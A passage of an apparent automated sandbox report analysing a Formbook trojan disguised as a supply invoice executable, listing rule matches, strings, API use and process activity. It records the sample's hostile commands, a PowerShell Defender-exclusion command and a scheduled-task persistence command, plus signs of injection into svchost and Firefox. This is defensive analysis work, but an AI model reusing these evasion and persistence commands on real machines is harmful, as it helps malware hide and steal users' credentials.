            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FFF0915_2_035FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03503FD215_2_03503FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03503FD515_2_03503FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03541F9215_2_03541F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FFFB115_2_035FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03549EB015_2_03549EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F1D5A15_2_035F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03543D4015_2_03543D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F7D7315_2_035F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0355FDC015_2_0355FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035B9C3215_2_035B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FFCF215_2_035FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007C1A7015_2_007C1A70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007BC97015_2_007BC970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007BC96715_2_007BC967
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007BCB9015_2_007BCB90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007BAC1015_2_007BAC10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007C514015_2_007C5140
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007C331015_2_007C3310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007C330B15_2_007C330B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007B139115_2_007B1391
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007DB74015_2_007DB740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0340E2F715_2_0340E2F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0340E7AC15_2_0340E7AC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0340E41315_2_0340E413
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0340CAD315_2_0340CAD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0340D81815_2_0340D818
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03587E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0352B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03575130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035BF290 appears 105 times
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: String function: 01757E54 appears 111 times
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: String function: 016FB970 appears 280 times
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: String function: 0178F290 appears 105 times
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: String function: 01745130 appears 58 times
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: String function: 0177EA12 appears 86 times
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000002.2189838691.000000000184E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000002.2204578486.00000000044A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000002.2214689659.00000000079A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119955184.000000000107A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepaDa.exe@ vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300268708.0000000001177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300679134.00000000017FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300268708.0000000001197000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exeBinary or memory string: OriginalFilenamepaDa.exe@ vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: z1SupplyInvoiceCM60916_Doc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: dpqsbGoWdXlp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, xw89F7YueMt8vZytUc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, xw89F7YueMt8vZytUc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, xw89F7YueMt8vZytUc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@15/9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeFile created: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4340:120:WilError_03
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeFile created: C:\Users\user\AppData\Local\Temp\tmp68D8.tmp
            Source: z1SupplyInvoiceCM60916_Doc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: z1SupplyInvoiceCM60916_Doc.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: UPDATE [dbo].[Customers] SET [C_Fname] = @C_Fname, [C_Lname] = @C_Lname, [C_address] = @C_address, [C_City] = @C_City, [C_Country] = @C_Country, [C_datemodifay] = @C_datemodifay WHERE (([C_id] = @Original_C_id) AND ([C_Fname] = @Original_C_Fname) AND ([C_Lname] = @Original_C_Lname) AND ([C_City] = @Original_C_City) AND ([C_Country] = @Original_C_Country) AND ((@IsNull_C_datemodifay = 1 AND [C_datemodifay] IS NULL) OR ([C_datemodifay] = @Original_C_datemodifay)));
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: INSERT INTO [dbo].[Product] ([Product_name], [p_modifaydate]) VALUES (@Product_name, @p_modifaydate);
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: INSERT INTO [dbo].[Orders] ([C_id], [order_date], [sheeped_date], [O_maodifaydate]) VALUES (@C_id, @order_date, @sheeped_date, @O_maodifaydate);
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: UPDATE [dbo].[Users] SET [UserName] = @UserName, [Password] = @Password WHERE (([UserName] = @Original_UserName) AND ([Password] = @Original_Password));
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: INSERT INTO [dbo].[Jurnal] ([Date], [Operation], [Table_name], [Old_values], [New_values]) VALUES (@Date, @Operation, @Table_name, @Old_values, @New_values);
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: UPDATE [dbo].[Orders] SET [C_id] = @C_id, [order_date] = @order_date, [sheeped_date] = @sheeped_date, [O_maodifaydate] = @O_maodifaydate WHERE (([Order_id] = @Original_Order_id) AND ([C_id] = @Original_C_id) AND ([order_date] = @Original_order_date) AND ([sheeped_date] = @Original_sheeped_date) AND ((@IsNull_O_maodifaydate = 1 AND [O_maodifaydate] IS NULL) OR ([O_maodifaydate] = @Original_O_maodifaydate)));
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: UPDATE [dbo].[Jurnal] SET [Date] = @Date, [Operation] = @Operation, [Table_name] = @Table_name, [Old_values] = @Old_values, [New_values] = @New_values WHERE (([Date] = @Original_Date) AND ([Operation] = @Original_Operation) AND ([Table_name] = @Original_Table_name));
            Source: svchost.exe, 0000000F.00000002.4576349725.0000000002E72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2474990393.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2475117325.0000000002E72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2477035867.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4577223668.0000000002ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: UPDATE [dbo].[Product] SET [Product_name] = @Product_name, [p_modifaydate] = @p_modifaydate WHERE (([Product_id] = @Original_Product_id) AND ([Product_name] = @Original_Product_name) AND ((@IsNull_p_modifaydate = 1 AND [p_modifaydate] IS NULL) OR ([p_modifaydate] = @Original_p_modifaydate)));
            Source: z1SupplyInvoiceCM60916_Doc.exeReversingLabs: Detection: 47%
            Source: z1SupplyInvoiceCM60916_Doc.exeString found in binary or memory: Cascade OrdersAcloseAllWindowsToolStripMenuItem#Close all windows-helpsToolStripMenuItem
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeFile read: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe
            Source: unknownProcess created: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess created: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: z1SupplyInvoiceCM60916_Doc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: z1SupplyInvoiceCM60916_Doc.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: z1SupplyInvoiceCM60916_Doc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: paDa.pdbSHA256 source: z1SupplyInvoiceCM60916_Doc.exe, dpqsbGoWdXlp.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IEFVDUdSaLLhw.exe, 0000000D.00000000.2215877606.0000000000B2E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2301632908.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2299969271.0000000003100000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: z1SupplyInvoiceCM60916_Doc.exe, z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2301632908.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2299969271.0000000003100000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: paDa.pdb source: z1SupplyInvoiceCM60916_Doc.exe, dpqsbGoWdXlp.exe.0.dr
            Source: Binary string: svchost.pdb source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300268708.0000000001177000.00000004.00000020.00020000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000003.2375679084.0000000000A49000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300268708.0000000001177000.00000004.00000020.00020000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000003.2375679084.0000000000A49000.00000004.00000001.00020000.00000000.sdmp

            Data Obfuscation

            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, KyybefU7jS1OJapg9Y.cs .Net Code: yN7bnauVQW System.Reflection.Assembly.Load(byte[])
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, KyybefU7jS1OJapg9Y.cs .Net Code: yN7bnauVQW System.Reflection.Assembly.Load(byte[])
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.351adf0.0.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, KyybefU7jS1OJapg9Y.cs .Net Code: yN7bnauVQW System.Reflection.Assembly.Load(byte[])
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.5e00000.4.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.352c034.1.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
